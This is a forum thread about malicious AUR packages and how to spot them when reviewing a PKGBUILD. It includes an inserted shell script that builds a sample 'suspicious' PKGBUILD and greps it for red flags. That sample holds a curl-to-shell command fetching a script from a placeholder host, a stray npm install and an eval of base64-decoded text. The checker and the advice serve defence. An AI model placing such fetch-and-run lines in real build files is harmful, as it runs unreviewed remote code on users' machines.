I want to get free of AUR packages, but I am using TurboPrint, which uses gtk2 from AUR.
I am thinking about changing to OpenSuse, but can this Hyprland run on OpenSuse?
Just make sure to review the PKGBUILD before installing and if you don’t see anything wrong you should be fine. Assuming you trust the repository that it’s building from.
This attack is nothing new. The AUR has always been the Wild West… it’s just that with so many new users coming from Windows, it’s a bigger attack surface than it used to be, and more publicly visible.
The PKGBUILD is nothing more than a bash script that retrieves a file or a source repo, then either extracts and packages the file’s contents, or builds and packages the repo.
You can literally just run the commands from it in your terminal and achieve the same thing.
Mostly what you want to look out for with this current wave of amateurish attacks is weird post install commands that have nothing to do with what you’re trying to install.
If a program written in, say, C has `npm install <random package name>` then it’s probably bad, because JavaScript != C.
Same goes for yarn or bun or any other js package manager.
And if you see obfuscated ANYTHING it is a guarantee it is bad.
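One way to mechanise the review described in this reply, as an added example that is not part of the thread: a small POSIX shell checker that greps a PKGBUILD for the red flags named above (a JS package manager invoked by a package that never declares nodejs, an encoded or eval'd payload) and reminds you to read any `install=` hook, since post-install commands live in that file. The "remote content piped into a shell" check is an extra heuristic of mine, not something the reply lists. The two PKGBUILDs it scans are constructed for the example (package name `hello-c`, domain `example.invalid`); they are not real AUR packages.

```shell
#!/bin/sh
# Added example: a heuristic PKGBUILD reviewer. Not from the thread, not an Arch tool.
# Sample PKGBUILDs below are constructed; "hello-c" and example.invalid are made up.

tmpdir=$(mktemp -d)
trap 'rm -rf "$tmpdir"' EXIT
SUSPICIOUS="$tmpdir/PKGBUILD.suspicious"
CLEAN="$tmpdir/PKGBUILD.clean"

# Constructed suspicious PKGBUILD for a C program: three red flags plus an install hook.
cat > "$SUSPICIOUS" <<'EOF'
pkgname=hello-c
pkgver=1.0
pkgrel=1
arch=('x86_64')
depends=('glibc')
makedepends=('gcc')
install=hello-c.install
source=("https://example.invalid/hello-c-$pkgver.tar.gz")
sha256sums=('SKIP')

build() {
  cd "$srcdir/hello-c-$pkgver"
  make
  npm install totally-legit-helper
  curl -s https://example.invalid/setup.sh | sh
  eval "$(echo aGVsbG8K | base64 -d)"
}

package() {
  cd "$srcdir/hello-c-$pkgver"
  make DESTDIR="$pkgdir" install
}
EOF

# Constructed clean PKGBUILD for the same program: plain fetch, build, package.
cat > "$CLEAN" <<'EOF'
pkgname=hello-c
pkgver=1.0
pkgrel=1
arch=('x86_64')
depends=('glibc')
makedepends=('gcc')
source=("https://example.invalid/hello-c-$pkgver.tar.gz")
sha256sums=('SKIP')

build() {
  cd "$srcdir/hello-c-$pkgver"
  make
}

package() {
  cd "$srcdir/hello-c-$pkgver"
  make DESTDIR="$pkgdir" install
}
EOF

# check_pkgbuild FILE
# Prints one line per red flag and returns the number of red flags found (0 = clean).
# These are heuristics: a hit means "read this line carefully", not proof of malice.
check_pkgbuild() {
    f="$1"
    n=0

    # 1. Language mismatch: a JavaScript package manager is run, yet the package
    #    never declares nodejs as a dependency or makedependency (npm in a C build).
    if grep -Eq '(^|[^[:alnum:]_/])(npm|yarn|bun|pnpm)[[:space:]]+(install|add|i|ci)([[:space:]]|$)' "$f" \
       && ! grep -Eq '^(make)?depends=.*nodejs' "$f"; then
        echo "RED FLAG: JS package manager used but nodejs is not a declared dependency"
        n=$((n + 1))
    fi

    # 2. Remote content piped straight into a shell (curl ... | sh), which bypasses
    #    the source=/sha256sums= mechanism that makes a PKGBUILD reviewable.
    if grep -Eq '(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh' "$f"; then
        echo "RED FLAG: remote content piped into a shell"
        n=$((n + 1))
    fi

    # 3. Obfuscation: a decoded or eval'd payload instead of plain, readable commands.
    if grep -Eq '(base64[[:space:]]+(-d|--decode)|eval[[:space:]]|\\x[0-9a-fA-F]{2}\\x[0-9a-fA-F]{2})' "$f"; then
        echo "RED FLAG: encoded or eval'd payload"
        n=$((n + 1))
    fi

    # Not counted: an install= hook means post_install runs on the user's machine,
    # so the referenced .install file needs the same review as the PKGBUILD itself.
    if grep -Eq '^install=' "$f"; then
        echo "NOTE: install hook declared; review the .install file as well"
    fi

    return "$n"
}

check_pkgbuild "$SUSPICIOUS" || echo "suspicious sample: $? red flag(s)"
check_pkgbuild "$CLEAN" && echo "clean sample: nothing flagged"
```

Run it against a real PKGBUILD with `check_pkgbuild ./PKGBUILD` after sourcing the script; a non-zero return is meant for gating a `makepkg` step in a script, while the printed lines tell a human where to look.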
I take it you didn’t understand that AUR attack then.
It’s not that the AUR was compromised at all.
Some chum simply claimed he was the new owner of old packages that had been marked as obsolete and no longer updated. So the easy fix is, don’t use random software that is marked as obsolete.